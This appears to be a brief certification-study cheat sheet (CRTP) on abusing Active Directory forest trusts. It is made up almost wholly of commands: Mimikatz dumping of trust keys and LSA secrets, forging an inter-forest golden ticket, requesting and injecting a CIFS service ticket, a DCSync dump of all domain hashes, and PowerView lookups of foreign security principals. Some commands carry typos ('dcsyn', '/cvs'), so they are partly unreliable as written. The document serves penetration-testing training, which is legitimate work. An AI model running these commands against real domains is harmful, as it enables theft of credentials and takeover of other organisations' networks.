CRTP (Ticket-Abuse)
CRTP (Ticket-Abuse)
CRTP (Ticket-Abuse)
Forest Trust Ticket Abuse
1. We require the trust key of inter-forest trust
1
2
Invoke-Mimikatz -Command '"lsadump::trust /patch"'
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
2. Forge the inter-forest TGT
1
Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:ad.domain.local /sid:<sid> /rc4:<rc4-hash> /service:krbtgt /target:domain2.local /ticket:C:\temp\trust_forest_tkt.kirbi"'
3. Request a TGS
1
.\asktgs.exe C:\temp\trust_forest_tkt.kirbi CIFS/dc.domain2.local
4. Inject and use the TGS
1
2
.\kirbikator.exe lsa .\CIFS.computer.targetDomain.local.kirbi
ls \\dc.domain2.local\shares\
Extras
To use the DCSync feature for getting krbtg hash execute the below command with DC privileges
1
Invoke-Mimikatz -Command '"lsadump::dcsyn /domain:dc.domain2.local /all /cvs"'
Get the ForeignSecurityPrincipal
1
2
3
4
5
6
#These SIDs can access to the target domain
Get-DomainObject -Domain targetDomain.local | ? {$_.objectclass -match "foreignSecurityPrincipal"}
#With the by default SIDs, we find S-1-5-21-493355955-4215530352-779396340-1104
#We search it in our current domain
Get-DomainObject |? {$_.objectsid -match "S-1-5-21-493355955-4215530352-779396340-1104"}
This post is licensed under
CC BY 4.0
by the author.